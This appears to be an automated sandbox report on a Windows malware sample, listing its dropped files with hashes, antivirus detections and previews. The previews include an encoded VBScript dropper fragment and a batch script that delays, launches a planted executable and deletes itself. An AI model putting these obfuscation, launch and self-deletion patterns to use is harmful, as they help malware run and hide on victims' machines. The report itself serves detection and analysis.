                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................R...6......Np... ........@.. ....................................@..................................p..K.................................................................................... ............... ..H............text...TP... ...R.................. ..`.sdata.../.......0...V..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\Desktop\6uPVRnocVS.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):209
                                                                                            Entropy (8bit):5.804005977208473
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:GxWvwqK+NkLzWbHa/JUrFnBaORbM5nCSh5gOO2EGcN1a0ZRWs:GxFMCzWLauhBaORbQCSvO2i3T1
                                                                                            MD5:FB2FC99109E35AA3774B04520DEB87F4
                                                                                            SHA1:1B1015EBF673817FBCEE6B66EFD432AF5D51DBFF
                                                                                            SHA-256:4A983C159C5B21D11C880FBFECBB7CB68304B15544C498092A980DEEAF3B01B8
                                                                                            SHA-512:9761994364DC66A9229ACEACF3079EFE6CB24BAF9DC831B2C4D97D36A6F5F3A6C5E9A9FCDBA9D67CD66235723DAC6CC80DE40349F989F629CE0CF93C234DFE8E
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:#@~^uAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z&hDKoDm:GCYmzd/4z\JOVx~JI0bvkp9!c4mYE~~TBPWl^d+czkAAA==^#~@.
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):68
                                                                                            Entropy (8bit):5.160704752887784
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:RnHmNV3mEst+eh1gnfpT/NyHfWEn:wNVjNehanRbgHfln
                                                                                            MD5:0F4077F402EF6344FB7F2E3237E3D345
                                                                                            SHA1:D0FDBD57DD26C8923F4F5E841006B88946FDD7C1
                                                                                            SHA-256:75F0DC9D5E03E19AAFCA14F919B625FC175AE988E5F3F9A3C9B6A72550E211B6
                                                                                            SHA-512:4962BA43F0C8DB79714F48C78246912CB889E8795C6BD1CAFDA7402BDE0034BF0544963D4D57B2D601B8DB94FFFDCFEB2C2E3CF8EA9F96DC9B8074858508A984
                                                                                            Malicious:false
                                                                                            Preview:8rJNDTbChaKPRY4Toi3UraUsuHUnF0U5Ww71IxJ7h7Gbz4Yf16V3eIWhWbc58x7qGP3f
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................R...6......Np... ........@.. ....................................@..................................p..K.................................................................................... ............... ..H............text...TP... ...R.................. ..`.sdata.../.......0...V..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with very long lines (752), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):752
                                                                                            Entropy (8bit):5.898800312713616
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:5/AmEtRwKhzsdZtFEPSzs5lIz6qVVkq1Ng0UGEdKQX01QIFWBEUD9sieZQnTxfUm:qdwLZf7sCbVkq1S0hEdNX0aIUD91Txcm
                                                                                            MD5:F06C7C9B7DA921CD336D538F17AAD421
                                                                                            SHA1:4F1C42EC6ABA42CD37062E6696C2C8D81D57AB22
                                                                                            SHA-256:0F96287E13AE5F1C4D8871CCF66E65F0C079AE4F2EF289EE429470F1BDC2DA69
                                                                                            SHA-512:80EC64F9A1EE7643C431CCD9C0DCF139B2EC71278AB0E5DDF2B266C99B5C2743C1FE4681B4333A67D0F2E0E0AA6A7374C8D795B585BD0A6C37F3BAD76702D359
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):97
                                                                                            Entropy (8bit):5.46173111029117
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:/rUtwxofqxAH23BbsZD0YX3Vhn:AtwxoHyBbU4I3Vh
                                                                                            MD5:83D62408A0AF624CD1B374FCF9B93BBA
                                                                                            SHA1:B96F0431FAA45519D3502660117500B4252D3F7B
                                                                                            SHA-256:579634C1C1754FB71DE6AD745D48FC9EC0A43202C22AA717D80DA9BAD056E1F3
                                                                                            SHA-512:CA176B96EDDAA4B4C1D76616085A615FA68732B7E6B63C9697FF32EE5420E8D8BA23C52D6640480EA815CAAAA91E77EC3D8E3A626319EE6987F085B8B238D27F
                                                                                            Malicious:false
                                                                                            Preview:04rVBNQVYZypEONUYEF2lxfWzJB2Oq034tTaA1NYvNKg9riSt4qZuGdCZVf1LXHsj4vV4wUg0qHXn9XIltJT9aJxPQBoWWMXG
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with very long lines (971), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):971
                                                                                            Entropy (8bit):5.917091070972345
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:kZuEG8Ozwn/fbJeDYBNiVeC2eOZnNMVyPopQYgGzv3n:kZu1zAzJ5iVSeOzNPGEGT
                                                                                            MD5:22AFF065E8BFDFC5AEB11738197D2136
                                                                                            SHA1:4EFD0655004CAB9F03E8C14799FB94EF8DB141AE
                                                                                            SHA-256:456308AF5894BEC51DD27C024B1F0B1E6DBA2CE439A31C6585342976F1B95E55
                                                                                            SHA-512:24D04A1F94F77B52E37F971B5188A4D85528090E9C7FE50ED03C22FFB9BA44009F86101AD95CFADA3EDDC8542DC6634E5306870AD60D07566B5155738BA8EBB8
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with very long lines (366), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):366
                                                                                            Entropy (8bit):5.835215202803588
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Ijl3HoLT7INxnOScgHgPa+SQUmrHqKI0IqNnJDBn1azA+KVQtb2Q2+UsqlUTtzae:I5XMTENp7cTeBm1I6nJVn1as+OXRWtme
                                                                                            MD5:73A6CA03CA9170D2D43FCFA80860A4DC
                                                                                            SHA1:36A7040735A6A7C9BAF79789D0A0E6FEFFFCD2A5
                                                                                            SHA-256:D76CBC9A95D2D6BDBE2237CBED9EBA5ACD71BFF641BA6659AF387FD85976A9B1
                                                                                            SHA-512:E7ACAD37288E94741C0488696F02BE1FB30343DAF58FA1C4D48464C5B442BCC747D7853E9F99F4181A11BE122A77BFE9E335D2B8D726E01177533FCE282B91C1
                                                                                            Malicious:false
                                                                                            Preview:5xksaRZILI0MzTzVrmtsVBLRuNgO6dXMWWkO7f7Vpzege1qjotiHSvA3lS8NvLMrvnzdslXMpXDghpx2g6kM5P4lVqmogujdmwu1CN0DVVc4reW5fGqyl9wftOHB8tq5yk3v46zTFh0jx941UqJaDu2n9PHxFzEmphGHklBjQXtEIMrtUQrRkP1DrQvpyBOQcN3Q3wQspjJqByewhYdyHxCZpCZU0VvOIcl4Tb0hA8lAGKB2v8HZiZIoLdk0X62Ty5hiMjdGi6yJLCTfBgj1OVqtU6tz19KDFRLKndpLeB1lk9dIKFz0WBFdPyOQ0oOiwuD41J1i1XXNdEIUdkpwKTqEMr5yOZVzwTy06jRANR99n1
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:CSV text
                                                                                            Category:dropped
                                                                                            Size (bytes):1281
                                                                                            Entropy (8bit):5.370111951859942
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1915
                                                                                            Entropy (8bit):5.363869398054153
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpB1Gq2
                                                                                            MD5:5D3E8414C47C0F4A064FA0043789EC3E
                                                                                            SHA1:CF7FC44D13EA93E644AC81C5FE61D6C8EDFA41B0
                                                                                            SHA-256:4FDFF52E159C9D420E13E429CCD2B40025A0110AD84DC357BE17E21654BEEBC7
                                                                                            SHA-512:74D567BBBA09EDF55D2422653F6647DCFBA8EF6CA0D4DBEBD91E3CA9B3A278C99FA52832EDF823F293C416053727D0CF15F878EC1278E62524DA1513DA4AC6AF
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe
                                                                                            File Type:CSV text
                                                                                            Category:dropped
                                                                                            Size (bytes):1281
                                                                                            Entropy (8bit):5.370111951859942
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                            Malicious:false
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                            Category:dropped
                                                                                            Size (bytes):106496
                                                                                            Entropy (8bit):1.1358696453229276
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                            Malicious:false
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                            Category:dropped
                                                                                            Size (bytes):98304
                                                                                            Entropy (8bit):0.08235737944063153
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                            Malicious:false
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                            Category:dropped
                                                                                            Size (bytes):40960
                                                                                            Entropy (8bit):0.8553638852307782
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                            Malicious:false
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                            Category:dropped
                                                                                            Size (bytes):28672
                                                                                            Entropy (8bit):2.5793180405395284
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):25
                                                                                            Entropy (8bit):4.483856189774723
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:3IoJNtTEyE:3VhgyE
                                                                                            MD5:53788CFC654E1A26F548E97835ED703B
                                                                                            SHA1:A488C0656F140846DEB2453E35AE6BF9D26BB9F8
                                                                                            SHA-256:A006712AF435969AA63A6E86036C6115663FD94893936A9278B693DDEEF69957
                                                                                            SHA-512:80361B5BACA1A652ED1588F719123D31B825A7418AAA5615F752191464C4BF3DC3FC1A08B0ED4BECB565387EBA95B0A9D4568779584E3362B5668FC1BB486AA3
                                                                                            Malicious:false
                                                                                            Preview:CwHmMlhLeY7w68cqjsoA4q20K
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                            Category:dropped
                                                                                            Size (bytes):159744
                                                                                            Entropy (8bit):0.7873599747470391
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                            MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                            SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                            SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                            SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                            Malicious:false
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                            Category:dropped
                                                                                            Size (bytes):114688
                                                                                            Entropy (8bit):0.9746603542602881
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                            Malicious:false
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                            Category:dropped
                                                                                            Size (bytes):126976
                                                                                            Entropy (8bit):0.47147045728725767
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                            MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                            SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                            SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                            SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                            Malicious:false
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                            Category:dropped
                                                                                            Size (bytes):114688
                                                                                            Entropy (8bit):0.9746603542602881
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):185
                                                                                            Entropy (8bit):5.03236672359481
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:mKDDBEIFK+KdTVpM3No+HK9ATScyW+jn9m7a0ZBktKcKZG1t+kiE2J5xAIXwHoh:hITg3Nou11r+DE7aYKOZG1wkn23fXwHG
                                                                                            MD5:9EC904FC9D43E3D4684FDE40165766D5
                                                                                            SHA1:28406D16124B00AAD7E34E9611E01C4447523358
                                                                                            SHA-256:AA6508B184D1C13CF21AAD13ACBD5453C300B747A7CA393B095597FF467DF1EC
                                                                                            SHA-512:E74C18175C3A69EA7BAF7F45E6E6BC3E23B2D2161C4D5B408A1137F704AC63962E4E9EF2F26F7BC53A56280B15E25F7F4441295ED3EC108848268AEEE17E0095
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Recovery\upfc.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\e65pqCzUjZ.bat"
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                            Category:dropped
                                                                                            Size (bytes):20480
                                                                                            Entropy (8bit):0.5712781801655107
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                            Malicious:false
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                            Category:dropped
                                                                                            Size (bytes):49152
                                                                                            Entropy (8bit):0.8180424350137764
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                            Malicious:false
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                            Category:dropped
                                                                                            Size (bytes):40960
                                                                                            Entropy (8bit):0.8553638852307782
                                                                                            Encrypted:false
